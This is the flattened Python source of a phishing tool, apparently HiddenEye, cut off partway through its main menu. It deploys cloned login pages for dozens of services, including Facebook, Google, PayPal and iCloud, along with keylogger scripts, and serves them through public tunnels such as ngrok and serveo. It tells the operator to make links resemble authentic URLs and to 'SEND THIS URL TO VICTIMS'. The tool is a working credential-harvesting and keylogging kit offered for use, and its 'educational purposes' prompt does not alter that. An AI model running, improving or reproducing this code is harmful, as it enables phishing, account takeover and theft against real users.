# Any actions must be here import getpass import base64 from os import system, path from distutils.dir_util import copy_tree from time import sleep import re import json from urllib.request import urlopen from subprocess import check_output, CalledProcessError from sys import stdout, argv, exit from Defs.ThemesManager import colorSelector from Defs.Configurations import readConfig, ifSettingsNotExists from Defs.Languages import * installGetText() languageSelector() ifSettingsNotExists() config = readConfig() logFile = None didBackground = config.get("Settings", "DidBackground") for arg in argv: if arg == "--nolog": # If true - don't log didBackground = False if config.get("Settings", "DidBackground") == "True": logFile = open("log.txt", "w") colorTheme = colorSelector() MAIN0, MAIN1, MAIN2, MAIN3, MAIN4 = colorTheme[0], colorTheme[ 1], colorTheme[2], colorTheme[3], colorTheme[4] def runPhishing(page, customOption): # Phishing pages selection menu system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/ && rm -rf link.url') if customOption == '1' and page == 'Facebook': copy_tree("WebPages/fb_standard/", "Server/www/") elif customOption == '2' and page == 'Facebook': copy_tree("WebPages/fb_advanced_poll/", "Server/www/") elif customOption == '3' and page == 'Facebook': copy_tree("WebPages/fb_security_fake/", "Server/www/") elif customOption == '4' and page == 'Facebook': copy_tree("WebPages/fb_messenger/", "Server/www/") elif customOption == '1' and page == 'Google': copy_tree("WebPages/google_standard/", "Server/www/") elif customOption == '2' and page == 'Google': copy_tree("WebPages/google_advanced_poll/", "Server/www/") elif customOption == '3' and page == 'Google': copy_tree("WebPages/google_advanced_web/", "Server/www/") elif page == 'LinkedIn': copy_tree("WebPages/linkedin/", "Server/www/") elif page == 'GitHub': copy_tree("WebPages/GitHub/", "Server/www/") elif page == 'StackOverflow': copy_tree("WebPages/stackoverflow/", "Server/www/") elif page == 'WordPress': copy_tree("WebPages/wordpress/", "Server/www/") elif page == 'Twitter': copy_tree("WebPages/twitter/", "Server/www/") elif page == 'Snapchat': copy_tree("WebPages/Snapchat_web/", "Server/www/") elif page == 'Yahoo': copy_tree("WebPages/yahoo_web/", "Server/www/") elif page == 'Twitch': copy_tree("WebPages/twitch/", "Server/www/") elif page == 'Microsoft': copy_tree("WebPages/live_web/", "Server/www/") elif page == 'Steam': copy_tree("WebPages/steam/", "Server/www/") elif page == 'iCloud': copy_tree("WebPages/iCloud/", "Server/www/") elif customOption == '1' and page == 'Instagram': copy_tree("WebPages/Instagram_web/", "Server/www/") elif customOption == '2' and page == 'Instagram': copy_tree("WebPages/Instagram_autoliker/", "Server/www/") elif customOption == '3' and page == 'Instagram': copy_tree("WebPages/Instagram_advanced_attack/", "Server/www/") elif customOption == '4' and page == 'Instagram': copy_tree("WebPages/Instagram_VerifiedBadge/", "Server/www/") elif customOption == '5' and page == 'Instagram': copy_tree("WebPages/instafollowers/", "Server/www/") elif customOption == '1' and page == 'VK': copy_tree("WebPages/VK/", "Server/www/") elif customOption == '2' and page == 'VK': copy_tree("WebPages/VK_poll_method/", "Server/www/") elif page == 'GitLab': copy_tree("WebPages/gitlab/", "Server/www/") elif page == 'NetFlix': copy_tree("WebPages/netflix/", "Server/www/") elif page == 'Origin': copy_tree("WebPages/origin/", "Server/www/") elif page == 'Pinterest': copy_tree("WebPages/pinterest/", "Server/www/") elif page == 'ProtonMail': copy_tree("WebPages/protonmail/", "Server/www/") elif page == 'Spotify': copy_tree("WebPages/spotify/", "Server/www/") elif page == 'Quora': copy_tree("WebPages/quora/", "Server/www/") elif page == 'PornHub': copy_tree("WebPages/pornhub/", "Server/www/") elif page == 'Adobe': copy_tree("WebPages/adobe/", "Server/www/") elif page == 'Badoo': copy_tree("WebPages/badoo/", "Server/www/") elif page == 'CryptoCurrency': copy_tree("WebPages/cryptocurrency/", "Server/www/") elif page == 'DevianArt': copy_tree("WebPages/devianart/", "Server/www/") elif page == 'DropBox': copy_tree("WebPages/dropbox/", "Server/www/") elif page == 'eBay': copy_tree("WebPages/ebay/", "Server/www/") elif page == 'Myspace': copy_tree("WebPages/myspace/", "Server/www/") elif page == 'PayPal': copy_tree("WebPages/paypal/", "Server/www/") elif page == 'Shopify': copy_tree("WebPages/shopify/", "Server/www/") elif page == 'Verizon': copy_tree("WebPages/verizon/", "Server/www/") elif page == 'Yandex': copy_tree("WebPages/yandex/", "Server/www/") elif customOption == '1' and page == 'Reddit': copy_tree("WebPages/Reddit/", "Server/www/") elif customOption == '2' and page == 'Reddit': copy_tree("WebPages/Reddit-old/", "Server/www/") elif page == 'Subitoit': copy_tree("WebPages/subitoit/", "Server/www/") elif page == 'PlayStation': copy_tree('WebPages/playstation/', "Server/www/") elif page == 'Xbox': copy_tree('WebPages/xbox/', "Server/www/") elif page == 'CUSTOM(1)': print("\n\n {0}[{1}*{0}]{1} Custom Folder Directory is {0}WebPages/CUSTOM(1)".format(MAIN0, MAIN4)) print("\n {0}[{1}*{0}]{1} Please Read The manual.txt File Available At {0}[WebPages/CUSTOM(1)]".format(MAIN0, MAIN4)) input("\n\n {0}[{1}*{0}]{1} If You Have Set Up The Files Correctly, {0}Press Enter To continue.".format(MAIN0, MAIN4)) print("\n {0}[{1}*{0}]{1} Copying Your Files To Server/www Folder...".format(MAIN0, MAIN4)) sleep(3) copy_tree('WebPages/CUSTOM(1)/', "Server/www/") elif page == 'CUSTOM(2)': print("\n\n {0}[{1}*{0}]{1} Custom Folder Directory is {0}WebPages/CUSTOM(2)".format(MAIN0, MAIN4)) print("\n {0}[{1}*{0}]{1} Please Read The manual.txt File Available At {0}[WebPages/CUSTOM(2)]".format(MAIN0, MAIN4)) input("\n\n {0}[{1}*{0}]{1} If You Have Set Up The Files Correctly, {0}Press Enter To continue.".format(MAIN0, MAIN4)) print("\n {0}[{1}*{0}]{1} Copying Your Files To Server/www Folder...".format(MAIN0, MAIN4)) sleep(3) copy_tree('WebPages/CUSTOM(2)/', "Server/www/") else: endMessage(port) def selectPort(): # Question where user must select port system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ WEBSERVER PORT SELECTION ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print("\n {0}[{1}*{0}]{0}Select Any Available Port [1-65535]:{1}".format(MAIN0, MAIN4)) choice = input(" \n{0}HiddenEye >>> {2}".format(MAIN0, MAIN4, MAIN2)) try: if (int(choice) > 65535 or int(choice) < 1): return selectPort() else: return choice except: return selectPort() def selectServer(port): # Question where user must select server system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ HOST SERVER SELECTION ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print( "\n {0}[{1}*{0}]{0}Select Any Available Server:{1}".format(MAIN0, MAIN4)) print("\n {0}[{1}0{0}]{1}LOCALHOST \n {0}[{1}1{0}]{1}Ngrok\n {0}[{1}2{0}]{1}Serveo (Currently DOWN)\n {0}[{1}3{0}]{1}Localxpose\n {0}[{1}4{0}]{1}Localtunnel (Package Version)\n {0}[{1}5{0}]{1}Localtunnel (Binary Version)[Buggy]\n {0}[{1}6{0}]{1}OpenPort\n {0}[{1}7{0}]{1}Pagekite\n".format(MAIN0, MAIN2)) choice = input(" \n{0}HiddenEye >>> {2}".format(MAIN0, MAIN4, MAIN2)) if choice == '0': system('clear') runLocalhost(port) elif choice == '1': system('clear') runNgrok(port) elif choice == '2': system('clear') runServeo(port) elif choice == '3': system('clear') runLocalxpose(port) elif choice == '4': system('clear') runLT(port, True) elif choice == '5': system('clear') runLT(port, False) elif choice == '6': system('clear') runOpenport(port) elif choice == '7': system('clear') runPagekite(port) else: system('clear') return selectServer(port) def runLocalhost(port): system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALHOST SERVER ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print("\n {0}[{1}*{0}]{0}Enter Your LocalHost/Router Address [ifconfig]:{1}".format(MAIN0, MAIN4)) host = input(" \n{0}HiddenEye >>> {2}".format(MAIN0, MAIN4, MAIN2)) system("fuser -k %s/tcp > /dev/null 2>&1".format(port)) system("cd Server/www/ && php -S {0}:{1} > /dev/null 2>&1 &".format(host, port)) print('\n[*] Starting Server On Address:: {0}:{1}'.format(host, port)) sleep(2) system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ RUNNING LOCALHOST SERVER ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print("\n{0}[{1}!{0}]{1} SEND THIS URL TO THE VICTIMS ON SAME NETWORK-\n{0}[{1}*{0}]{1} Localhost URL: {2}http://{4}:{3}\n".format(MAIN0, MAIN2, MAIN3, port, host)) print("\n") def runPagekite(port): system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ PAGEKITE SERVER ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) if 256 == system('which python2 > /dev/null'): print('[*] Python2 not Installed, Pagekite Only Supports Python2!!') input('\n Press Enter To Try installing Python2 Now..') system('apt install python2') if 256 == system('which python2 > /dev/null'): system('clear') print("\n{0}[{1}*{0}] {1}FAILED TO INSTALL PYTHON2 (TRY MANUALLY)..{1}".format(MAIN0, MAIN4)) sleep(2) selectServer(port) else: pass else: try: subdomain = input("\n{0}[{2}*{0}] {0}Enter A Custom Subdomain Ex.(yourname):\n{0}Custom Subdomain>>> {2}".format(MAIN0, MAIN4, MAIN2)) print("\n{0}[{1}*{0}] {1}Use Temporary Email Services(Don't Harm Anyone).{1}".format(MAIN0, MAIN4)) print("\n{0}[{1}*{0}] {1}Sometime Email verification Required by Pagekite(Stay Alert){1}".format(MAIN0, MAIN4)) print("\n{0}[{1}*{0}] {1}You can also get various subdomain assigned to your subdomain.{1}".format(MAIN0, MAIN4)) print("\n{0}[{1}*{0}] {1}Check Control Panel Of pagekite at https://pagekite.net/ .{1}".format(MAIN0, MAIN4)) print("\n{0}[{1}*{0}] {1}We are Ready to Launch Pagekite.Press CTRL+C Whenever Need captured Data.{1}".format(MAIN0, MAIN4)) input("\n\n{0}[{1}*{0}] {0}Press Enter To Launch The Pagekite...{1}".format(MAIN0, MAIN4)) system("fuser -k %s/tcp > /dev/null 2>&1" % (port)) system("cd Server/www/ && php -S localhost:%s > /dev/null 2>&1 &" % (port)) system('python2 Server/pagekite.py --clean --signup {0} {1}.pagekite.me'.format(port, subdomain)) except: print('[*] Unable To get Tunnel..Going Back') sleep(3) def runOpenport(port): system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ OPENPORT SERVER ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) if 256 == system('which openport > /dev/null'): system('clear') print('[*] Openport not Installed correctly, Try installing it manually !!') print('[*] Check Here ... https://openport.io/download') input('\n Press Enter To Go back..') selectServer(port) else: manageOpenporturl(port) def manageOpenporturl(port): # Its all about How we generate a url from openport, & How we used grep & curl to get a url to shown on final panel of script. print("\n{0}[{1}*{0}] {0}Please Be Calm , We are Working To get a Openport URL For You.{1}".format(MAIN0, MAIN4)) sleep(2) system('rm filename.txt') try: system('openport -K && openport %s > openport.txt &' % (port)) # Running openport server and putting the process in background using (&) and writing the output to a txt file. print('[*] Openport Server Running in Background.. Please wait.') sleep(20) # Sleep time is important as the openport command takes some time to give response link. system('cat openport.txt | grep https://spr.openport.io/l/...................... -oh > urltoverify.txt') # Taking out the neccesary verification link from output txt file of openport (above). print('[*] Getting the verification link of openurl tunnel.') with open('urltoverify.txt') as f: read_data = f.read() if 'https://spr.openport.io/l/' in read_data: print('[*] In case Error Occured Visit Below Link to Get your Tunnel Link') pass else: print('[^] Unable To Got Openport Link. ') print('[*] You Have Reached Maximum Free Tunnels or (Server Down).') print('[*] Trying Again..') sleep(7) runOpenport(port) urlFile = open('urltoverify.txt', 'r') urltoverify = urlFile.read().strip() print('{0}[{1}*{0}] {1}Got A Verification Link:{0} '.format(MAIN0, MAIN4)) # Creating a curl request to start the tunnel from the verification link, And grabing the whole content of the HTML page ( To get tunnel link .) system('touch filename.txt') with open('filename.txt', 'r') as f: read_data = f.read() c = read_data.replace('', ' -o urlindex.txt') f = open('filename.txt', 'w') f.write(c) f.close() with open('filename.txt', 'r') as f: filename = f.read() urltoverify = urltoverify+filename print('\n\n[*] Requesting Server to Get the working Url For Tunnel.') system('curl {0}'.format(urltoverify)) # Creating a curl request to start the tunnel from the verification link, And grabing the whole content of the HTML page ( To get tunnel link .) sleep(5) # From that html file codes we are grabing our tunnel link ( Tunnel link available 2 times in Source Codes So we have to remove duplicates in order to get one link to show on script) print('\n[*] Index File of response Saved.') sleep(8) print('[*] Finding Original Url From index File.') system('rm filename.txt && touch filename.txt') with open('filename.txt', 'r') as f: read_data = f.read() c = read_data.replace('', ' | grep http://spr.openport.io:..... -oh > mixedurl.txt') f = open('filename.txt', 'w') f.write(c) f.close() with open('filename.txt', 'r') as f: filename = f.read().strip() system('cat urlindex.txt {0}'.format(filename)) # From that html file codes we are grabing our tunnel link ( Tunnel link available 2 times in Source Codes So we have to remove duplicates in order to get one link to show on script) system('rm filename.txt && touch filename.txt') with open('filename.txt', 'r') as f: read_data = f.read() c = read_data.replace('', ' > openporturl.txt') f = open('filename.txt', 'w') f.write(c) f.close() with open('filename.txt', 'r') as f: filename = f.read().strip() sleep(6) print('[*] Removing The Duplicates Of Original Url.') system('sort +2 -u mixedurl.txt {0}'.format(filename)) # It will remove the duplicate and make it single url. urlFile = open('openporturl.txt', 'r') url = urlFile.read() sleep(3) print('[*] We Got The URL :{0}'.format(url)) sleep(15) system('rm urltoverify.txt && rm mixedurl.txt && rm urlindex.txt && rm openport.txt') # To remove all the above used txt files. system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ OPENPORT SERVER ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print("\n{0}[{1}!{0}]{1} SEND THIS OPENPORT URL TO VICTIMS-\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} OPENPORT URL: {2}".format(MAIN0, MAIN2, MAIN3, port) + url + "{1}".format(MAIN0, MAIN4, MAIN3)) print("\n") except: input('\n\n[*] Failed To Get URL.. Press Enter To Go Back.') sleep(2) selectServer(port) def runNgrok(port): print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ NGROK SERVER ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) system('./Server/ngrok http {} > /dev/null &'.format(port)) while True: sleep(2) system( 'curl -s -N | grep "https://[0-9a-z]*\.ngrok.io" -oh > link.url') urlFile = open('link.url', 'r') url = urlFile.read() urlFile.close() if re.match("https://[0-9a-z]*\.ngrok.io", url) != None: print("\n{0}[{1}!{0}]{1} SEND THIS NGROK URL TO VICTIMS-\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} NGROK URL: {2}".format( MAIN0, MAIN2, MAIN3, port) + url + "{1}".format(MAIN0, MAIN4, MAIN3)) print("\n") break def runLocalxpose(port): print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALXPOSE URL TYPE SELECTION ]{1}!! {0}\n-------------------------------\n'''.format(MAIN0, MAIN2)) print("\n{0}[{1}*{0}]{0}CHOOSE ANY LOCALXPOSE URL TYPE TO GENERATE PHISHING LINK:{1}".format(MAIN0, MAIN2)) print("\n{0}[{1}1{0}]{1}Custom URL {0}(Generates designed url) \n{0}[{1}2{0}]{1}Random URL {0}(Generates Random url)".format(MAIN0, MAIN2)) choice = input("\n\n{0}YOUR CHOICE >>> {2}".format(MAIN0, MAIN4, MAIN2)) system('clear') if choice == '1': customLocalxpose(port) elif choice == '2': randomLocalxpose(port) else: system('clear') return runLocalxpose(port) def customLocalxpose(port): print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CREATE A CUSTOM URL HERE ]{1}!! {0}\n-------------------------------\n\n{0}[{1}!{0}]{1} YOU CAN MAKE YOUR URL SIMILAR TO AUTHENTIC URL.\n\n{0}Insert a custom subdomain for Localxpose(Ex: mysubdomain)'''.format(MAIN0, MAIN2)) lnk = input("\n{0}CUSTOM Subdomain>>> {2}".format(MAIN0, MAIN4, MAIN2)) system('./Server/loclx tunnel http --to :%s --subdomain %s > link.url 2> /dev/null &' % (port, lnk)) sleep(7) try: output = check_output( "grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CUSTOM SERVEO URL ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print("\n{0}[{1}!{0}]{1} SEND THIS LOCALXPOSE URL TO VICTIMS-\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} LOCALXPOSE URL: {2}".format( MAIN0, MAIN2, MAIN3, port) + url + "{1}".format(MAIN0, MAIN4, MAIN3)) print("\n") except CalledProcessError: print('''\n\n{0}FAILED TO GET THIS DOMAIN. !!!\n\n{0}LOOKS LIKE CUSTOM URL IS NOT VALID or ALREADY OCCUPIED BY SOMEONE ELSE. !!!\n\n{0}[{1}!{0}]TRY TO SELECT ANOTHER CUSTOM DOMAIN{1} (GOING BACK).. !! \n '''.format(MAIN0, MAIN4)) sleep(4) system('clear') return customLocalxpose(port) def randomLocalxpose(port): system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ RANDOM LOCALXPOSE URL ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) system('./Server/loclx tunnel http --to :%s > link.url 2> /dev/null &' % (port)) sleep(8) try: output = check_output( "grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True) url = output.decode('utf-8') print("\n{0}[{1}!{0}]{1} SEND THIS LOCALXPOSE URL TO VICTIMS-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} LOCALXPOSE URL: {2}{4}{1}".format( MAIN0, MAIN4, MAIN3, port, url) + "{1}".format(MAIN0, MAIN4, MAIN3)) print("\n") except CalledProcessError: sleep(4) system('clear') return randomLocalxpose(port) def runServeo(port): print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ SERVEO URL TYPE SELECTION ]{1}!! {0}\n-------------------------------\n{0}[{1}!{0}]{1}REMEMBER ? Serveo Don't Allows Phishing.\n{0}[{1}!{0}]{1}They Drops The Connection Whenever Detects Phishing. '''.format(MAIN0, MAIN2)) print("\n{0}[{1}*{0}]{0}CHOOSE ANY SERVEO URL TYPE TO GENERATE PHISHING LINK:{1}".format(MAIN0, MAIN2)) print("\n{0}[{1}1{0}]{1}Custom URL {0}(Generates designed url) \n{0}[{1}2{0}]{1}Random URL {0}(Generates Random url)".format(MAIN0, MAIN2)) choice = input("\n\n{0}YOUR CHOICE >>> {2}".format(MAIN0, MAIN4, MAIN2)) system('clear') if choice == '1': customServeo(port) elif choice == '2': randomServeo(port) else: system('clear') return runServeo(port) def customServeo(port): print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CREATE A CUSTOM URL HERE ]{1}!! {0}\n-------------------------------\n\n{0}[{1}!{0}]{1} YOU CAN MAKE YOUR URL SIMILAR TO AUTHENTIC URL.\n\n{0}Insert a custom subdomain for serveo'''.format(MAIN0, MAIN2)) lnk = input("\n{0}CUSTOM Subdomain>>> {2}".format(MAIN0, MAIN4, MAIN2)) if not ".serveo.net" in lnk: lnk += ".serveo.net" else: pass system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=60 -R %s:80:localhost:%s serveo.net > link.url 2> /dev/null &' % (lnk, port)) sleep(7) try: output = check_output( "grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ CUSTOM SERVEO URL ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS-\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} SERVEO URL: {2}".format( MAIN0, MAIN2, MAIN3, port) + url + "{1}".format(MAIN0, MAIN4, MAIN3)) print("\n") except CalledProcessError: print('''\n\n{0}FAILED TO GET THIS DOMAIN. !!!\n\n{0}LOOKS LIKE CUSTOM URL IS NOT VALID or ALREADY OCCUPIED BY SOMEONE ELSE. !!!\n\n{0}[{1}!{0}]TRY TO SELECT ANOTHER CUSTOM DOMAIN{1} (GOING BACK).. !! \n '''.format(MAIN0, MAIN4)) sleep(4) system('clear') return customServeo(port) def randomServeo(port): system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ RANDOM SERVEO URL ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) system('ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:%s serveo.net > link.url 2> /dev/null &' % (port)) sleep(8) try: output = check_output( "grep -o '.\{0,0\}http.\{0,100\}' link.url", shell=True) url = output.decode("utf-8") print("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} SERVEO URL: {2}".format( MAIN0, MAIN4, MAIN3, port) + url + "{1}".format(MAIN0, MAIN4, MAIN3)) print("\n") except CalledProcessError: sleep(4) system('clear') return randomServeo(port) def runLT(port, npm): system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print( "\n{0}[{1}*{0}]{0}SELECT ANY URL TYPE TO GENERATE PHISHING LINK:{1}".format(MAIN0, MAIN2)) print("\n{0}[{1}+{0}]{1}Type Subdomain for Custom URL. \n{0}[{1}+{0}]{1}Leave Empty For Random URL".format(MAIN0, MAIN2)) s = input('\n{0}(Localtunnel/Subdomain)> {2}'.format(MAIN0, MAIN4, MAIN2)) try: system('{0}lt -p '.format('' if npm else 'Server/') + port+((' -s '+s) if s != '' else s)+' > link.url &') sleep(3) system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print("\n{0}[{1}!{0}]{1} SEND THIS SERVEO URL TO VICTIMS-\n\n{0}[{1}*{0}]{1} Localhost URL: {2}{3}\n{0}[{1}*{0}]{1} LOCALTUNNEL URL: {2}{4}".format( MAIN0, MAIN2, MAIN3, port, str(check_output("grep -o '.\{0,0\}https.\{0,100\}' link.url", shell=True)).strip("b ' \ n r"))) except CalledProcessError: system('clear') print(''' {1}_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1} |__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1} | | | ]__| ]__| |__ | \| {0}|__ || |__{1} {0}http://github.com/darksecdevelopers {0}** BY:DARKSEC ** \n\n-------------------------------\n{0}[ LOCALTUNNEL URL ]{1}!! {0}\n-------------------------------'''.format(MAIN0, MAIN2)) print('{0}error[invalid/preoccupied]{0}'.format(MAIN0)) runLT(port, npm) def runMainMenu(): # menu where user select what they wanna use # Terms Of Service print(" _________________________________________________\n | WITH GREAT POWER , COMES GREAT RESPONSIBILITY | \n +++++++++++++++++++++++++++++++++++++++++++++++++") if input("\n\n\n\n{2}[{1}!{2}]{1} Do you agree to use this tool for educational/testing purposes only? ({0}Y{1}/{2}N{1})\n{2}HiddenEye >>> {0}".format(MAIN2, MAIN4, MAIN0)).upper() != 'Y': system('clear') print("\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE.!{1} ]\n\n".format(MAIN0, MAIN4)) exit() def mainMenu(): system('clear') with open('version.txt') as f: ver_current = f.read() version = ver_current.strip() print(''' {2} ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ ███████ {1} {2} ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ ██ {1} {2} ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ ███████ {1} {2} ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ ██ {1} {2} ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ ███████ {1} {3}[{1}v {4}{3}]{1} BY:DARKSEC{2} {3}[{2} Modern Phishing Tool With Advanced Functionality {3}] {3}[{2} PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING {3}] ________________________________________________________________________________'''.format(MAIN3, MAIN4, MAIN2, MAIN0, version)) print("------------------------\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n------------------------".format(MAIN0, MAIN2)) print(" {0}[{1}01{0}]{1} Facebook {0}[{1}13{0}]{1} Steam {0}[{1}25{0}]{1} Badoo {0}[{1}37{0}]{1} PlayStation".format(MAIN0, MAIN2)) print(" {0}[{1}02{0}]{1} Google {0}[{1}14{0}]{1} VK {0}[{1}26{0}]{1} CryptoCurrency {0}[{1}38{0}]{1} Xbox".format( MAIN0, MAIN2)) print(" {0}[{1}03{0}]{1} LinkedIn {0}[{1}15{0}]{1} iCloud {0}[{1}27{0}]{1} DevianArt {0}[{1}39{0}]{1} CUSTOM(1)".format( MAIN0, MAIN2)) print(" {0}[{1}04{0}]{1} GitHub {0}[{1}16{0}]{1} GitLab {0}[{1}28{0}]{1} DropBox {0}[{1}40{0}]{1} CUSTOM(2)".format( MAIN0, MAIN2)) print(" {0}[{1}05{0}]{1} StackOverflow 